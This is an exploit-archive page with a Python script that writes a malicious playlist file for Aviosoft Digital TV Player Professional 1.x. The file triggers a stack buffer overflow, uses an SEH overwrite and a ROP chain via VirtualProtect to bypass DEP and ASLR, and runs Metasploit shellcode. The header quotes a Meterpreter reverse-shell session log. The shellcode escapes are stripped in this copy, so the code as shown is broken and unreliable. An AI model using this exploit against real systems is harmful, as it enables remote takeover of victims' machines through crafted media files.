[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
# Published : 2011-11-09
# Author :
# Previous Title : mmPlayer 2.2 (.m3u) Local Buffer Overflow Exploit (SEH)
# Next Title : GTA SA-MP server.cfg Buffer Overflow
# Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
# Author: modpr0be
# Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro
# Date: 08/11/2011
# Tested on: Windows XP SP3, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
#
# msf exploit(handler) > exploit
#
# [*] Started reverse handler on 10.5.5.5:443
# [*] Starting the payload handler...
# [*] Sending stage (752128 bytes) to 10.5.5.14
# [*] Meterpreter session 1 opened (10.5.5.5:443 -> 10.5.5.14:49592) at 2011-09-27 21:15:34 +0700
#
# meterpreter > sysinfo
# Computer : M1ABRAMS
# OS : Windows 7 (Build 7601, Service Pack 1).
# Architecture : x86
# System Language : en_US
# Meterpreter : x86/win32
# meterpreter >
#
# but this time, it will pop up calc
# How to:
# open aviosoft digital tv player --> load playlist --> choose adtv_bof.plf --> calc
# it's generated using mona.py with some modifications ;) thx corelanc0d3r
#!/usr/bin/python
import struct
file = 'adtv_bof.plf'
totalsize = 5000
junk = 'A' * 872
align = 'B' * 136
# aslr, dep bypass using pushad technique
seh = struct.pack('<L', 0x6130534a) # ADD ESP,800 # RETN
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP)
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN
rop+= struct.pack('<L', 0x10011108) # ptr to &VirtualProtect()
rop+= struct.pack('<L', 0x64010503) # PUSH EDX # POP EAX # POP ESI # RETN
rop+= struct.pack('<L', 0x41414141) # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f) # MOV ECX,DWORD PTR DS:[EDX] # POP ESI
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (compensate)
rop+= struct.pack('<L', 0x61604218) # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6403d1a6) # POP EBP # RETN
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x60333560) # & push esp # ret 0c
rop+= struct.pack('<L', 0x61323EA8) # POP EAX # RETN
rop+= struct.pack('<L', 0xA13977DF) # 0x00000343-> ebx
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN
rop+= struct.pack('<L', 0x6163d37b) # PUSH EAX # ADD AL,5E # POP EBX # RETN
rop+= struct.pack('<L', 0x61626807) # XOR EAX,EAX # RETN
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN
rop+= struct.pack('<L', 0xA13974DC) # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb) # ADD EDX,EAX # MOV EAX,EDX # RETN
rop+= struct.pack('<L', 0x60326803) # POP ECX # RETN
rop+= struct.pack('<L', 0x60350340) # &Writable location
rop+= struct.pack('<L', 0x61329e07) # POP EDI # RETN
rop+= struct.pack('<L', 0x61326003) # RETN (ROP NOP)
rop+= struct.pack('<L', 0x60340178) # POP EAX # RETN
rop+= struct.pack('<L', 0x90909090) # nop
rop+= struct.pack('<L', 0x60322e02) # PUSHAD # RETN
nop = 'x90' * 32
# windows/exec - 223 bytes
# http://www.metasploit.com
calc = (
"xbfx77xbfx23x29xddxc1xd9x74x24xf4x58x2bxc9"
"xb1x32x31x78x12x03x78x12x83xb7xbbxc1xdcxcb"
"x2cx8cx1fx33xadxefx96xd6x9cx3dxccx93x8dxf1"
"x86xf1x3dx79xcaxe1xb6x0fxc3x06x7exa5x35x29"
"x7fx0bxfaxe5x43x0dx86xf7x97xedxb7x38xeaxec"
"xf0x24x05xbcxa9x23xb4x51xddx71x05x53x31xfe"
"x35x2bx34xc0xc2x81x37x10x7ax9dx70x88xf0xf9"
"xa0xa9xd5x19x9cxe0x52xe9x56xf3xb2x23x96xc2"
"xfaxe8xa9xebxf6xf1xeexcbxe8x87x04x28x94x9f"
"xdex53x42x15xc3xf3x01x8dx27x02xc5x48xa3x08"
"xa2x1fxebx0cx35xf3x87x28xbexf2x47xb9x84xd0"
"x43xe2x5fx78xd5x4ex31x85x05x36xeex23x4dxd4"
"xfbx52x0cxb2xfaxd7x2axfbxfdxe7x34xabx95xd6"
"xbfx24xe1xe6x15x01x1dxadx34x23xb6x68xadx76"
"xdbx8ax1bxb4xe2x08xaex44x11x10xdbx41x5dx96"
"x37x3bxcex73x38xe8xefx51x5bx6fx7cx39x9c")
sisa = 'C' * (totalsize - len(seh+rop+nop+calc))
payload = junk+seh+align+rop+nop+calc+sisa
f = open(file,'w')
print "Author: modpr0be"
print "Payload size: ", len(payload)
f.write(payload)
print "File",file, "successfully created"
f.close()